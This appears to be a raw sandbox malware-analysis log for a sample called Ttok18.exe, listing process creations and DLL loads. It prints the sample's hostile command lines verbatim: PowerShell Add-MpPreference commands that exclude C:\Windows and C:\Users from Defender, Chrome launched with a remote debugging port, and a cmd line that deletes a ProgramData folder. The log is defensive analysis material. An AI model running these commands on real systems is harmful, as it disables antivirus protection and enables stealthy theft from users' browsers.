            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe"
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeEJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
